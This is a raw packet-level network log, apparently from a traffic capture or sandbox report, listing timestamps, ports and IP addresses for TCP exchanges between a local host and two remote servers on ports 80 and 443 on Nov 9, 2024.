Nov 9, 2024 02:47:35.318319082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318327904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318330050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318334103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318341970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318387032 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318402052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318454981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318479061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318485975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318492889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318522930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318542004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318772078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318845034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318850040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318861961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318870068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318876028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318898916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318928003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318928957 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318934917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318948030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318955898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318959951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318965912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318980932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.318991899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318996906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.318996906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319030046 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319050074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319056034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319098949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319129944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319135904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319148064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319154024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319179058 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319196939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319267988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319283009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319288015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319310904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319340944 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319396973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319415092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319421053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319436073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319447041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319472075 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319483042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319489956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319499969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319502115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319505930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319525957 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319547892 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319657087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319664001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319675922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319680929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319686890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319708109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319731951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319746971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319751978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319787979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319796085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319797993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319828033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319926977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319933891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319972038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.319977045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.319979906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320022106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320023060 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.320029020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320040941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320045948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320081949 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.320095062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.320182085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320187092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320199013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320208073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.320240021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.320300102 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.320758104 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:35.320786953 CET	443	53062	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:35.321156979 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:35.321341038 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:35.321353912 CET	443	53062	23.198.7.184	192.168.2.7
Nov 9, 2024 02:47:35.322274923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322282076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322299957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322304964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322318077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322323084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322376966 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322419882 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322590113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322597027 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322602987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322623014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322629929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322642088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322649002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322654009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322655916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322691917 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322698116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322707891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322711945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322714090 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322737932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322758913 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322767973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322782040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322789907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322794914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322802067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322805882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322829008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322832108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322838068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322844028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322895050 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322921038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322926998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322933912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322940111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322962999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322967052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322974920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.322982073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.322994947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323002100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323012114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323014975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323021889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323029041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323038101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323043108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323057890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323062897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323071003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323090076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323118925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323127031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323133945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323139906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323143959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323173046 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323188066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323220015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323235035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323237896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323240995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323252916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323259115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323283911 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323299885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323331118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323343039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323348999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323360920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323365927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323371887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323385000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323396921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323396921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323404074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323416948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323416948 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323422909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323430061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323447943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323466063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323477030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323482990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323498964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323530912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323543072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323746920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323779106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323788881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323823929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323837042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323869944 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323913097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323920012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323930979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323935986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323951006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323957920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323961973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323967934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.323971033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323977947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.323983908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324001074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324021101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324038029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324588060 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324594975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324606895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324619055 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324623108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324640989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324666977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324675083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324675083 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324717045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324752092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324759007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324770927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324783087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324790001 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324800014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324800968 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324805975 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324832916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324841976 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324915886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324923038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324929953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324934959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324940920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324954987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324965000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324966908 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.324971914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.324986935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325002909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325033903 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325042963 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325050116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325062037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325067997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325077057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325089931 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325104952 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325148106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325189114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325220108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325226068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325237989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325267076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325299025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325314999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325328112 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325351000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325356960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325360060 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325371981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325407028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325438023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325444937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325463057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325469017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325475931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325484037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325495958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325510025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325512886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325516939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325531006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325537920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325541973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325550079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325575113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325598001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.325792074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325798035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.325850010 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326065063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326119900 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326144934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326149940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326167107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326194048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326206923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326212883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326231956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326278925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326430082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326436996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326448917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326487064 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326531887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326536894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326543093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326549053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326575041 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326591015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326659918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326673985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326679945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326685905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326690912 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326709032 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326724052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326739073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326744080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326754093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326782942 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326802969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326811075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326822996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326828003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326850891 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326874971 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326905966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326913118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326924086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326956987 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.326992035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.326997995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327009916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327016115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327023983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327035904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327043056 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327061892 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327074051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327080011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327110052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327116013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327124119 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327126980 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327157974 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:35.327188969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327195883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327203035 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327213049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327227116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:35.327236891 CET	80	52982	77.220.212.32	192.168.2.7
